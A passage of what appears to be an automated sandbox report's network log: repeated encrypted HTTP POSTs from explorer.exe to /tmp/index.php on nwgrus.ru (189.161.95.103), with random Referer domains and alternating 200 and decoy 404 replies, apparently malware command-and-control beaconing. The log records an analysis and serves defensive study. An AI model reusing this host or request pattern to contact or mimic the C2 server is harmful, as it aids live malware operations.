6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:44.594820976 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://stlewbfilnqojsrv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 125 Host: nwgrus.ru
Oct 14, 2024 01:52:44.594852924 CEST	125	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4e 09 dd e9 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuNo9M`_9*uqd]3
Oct 14, 2024 01:52:45.700979948 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:45 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:45.710191965 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://egmeddtwjwiedt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 177 Host: nwgrus.ru
Oct 14, 2024 01:52:45.710191965 CEST	177	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 65 54 df fc Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vueTG`Q3g"W1O]4}xh4-KFdKUbR1)Ey^C
Oct 14, 2024 01:52:46.816863060 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:46.826585054 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gklgbytfsyxm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 199 Host: nwgrus.ru
Oct 14, 2024 01:52:46.826607943 CEST	199	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 3f 55 b1 ed Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu?UJYSd<pTe$ImUUREK]%ATwq7(<6%d:ZS#7
Oct 14, 2024 01:52:47.921842098 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:47.931195021 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aovitjibeagnbys.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 345 Host: nwgrus.ru
Oct 14, 2024 01:52:47.931227922 CEST	345	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 45 51 d5 ba Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuEQIlLyc"\$6aer[+=]07E3oxW.t?B(/\|$K>E^Fl1aGu_Ek_uVCS2
Oct 14, 2024 01:52:49.045856953 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:48 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:49.054759026 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://snussmiqvhuxlm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 268 Host: nwgrus.ru
Oct 14, 2024 01:52:49.054791927 CEST	268	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 3f 4f fc 9c Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu?OLBUi9Ym94\|ZhT#b5R,Sb`9J9AH55vBU8'C94kYf+HXirXD
Oct 14, 2024 01:52:50.187657118 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:50.201419115 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lldjdgortos.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 116 Host: nwgrus.ru
Oct 14, 2024 01:52:50.201419115 CEST	116	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 5b 5c ba ae Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu[\}&feYI<Ui
Oct 14, 2024 01:52:51.527635098 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:51.541734934 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://syoedasuherii.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 135 Host: nwgrus.ru
Oct 14, 2024 01:52:51.541734934 CEST	135	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 3e 2f dd e5 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu>/T-DhxyRt*J>1LY8DUN
Oct 14, 2024 01:52:52.671621084 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:52.679179907 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://njefqjlwqiadunh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 324 Host: nwgrus.ru
Oct 14, 2024 01:52:52.679209948 CEST	324	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 27 05 ba 9a Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu'mSqIJ]CMuVO@)kd60e(-Y hOq.-~o1&)GSH/Ju0'[`UMGl8a;I'
Oct 14, 2024 01:52:53.788449049 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:53 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:53.800121069 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tdojljspnss.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 166 Host: nwgrus.ru
Oct 14, 2024 01:52:53.800148964 CEST	166	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5a 5d a6 8f Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuZ]kF8W~xiyE*gQwu62+~"RL:YHv3
Oct 14, 2024 01:52:54.895823002 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:54.906866074 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eodrfdbgkbdgmox.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 255 Host: nwgrus.ru
Oct 14, 2024 01:52:54.906898022 CEST	255	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 45 55 b1 e8 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuEUnJ\jO88q<;eJ<L]P]~pX5oaP0%w&z4X2C9Hq0Z>>.
Oct 14, 2024 01:52:55.999577999 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:56.008057117 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cguufeaxdioixvo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 276 Host: nwgrus.ru
Oct 14, 2024 01:52:56.008057117 CEST	276	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 45 4e c6 8e Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuENjTk^0\d$X~CxDay;LZFdEEe!3\|.NKe`E!~S#5`'7UhoGyiA\9
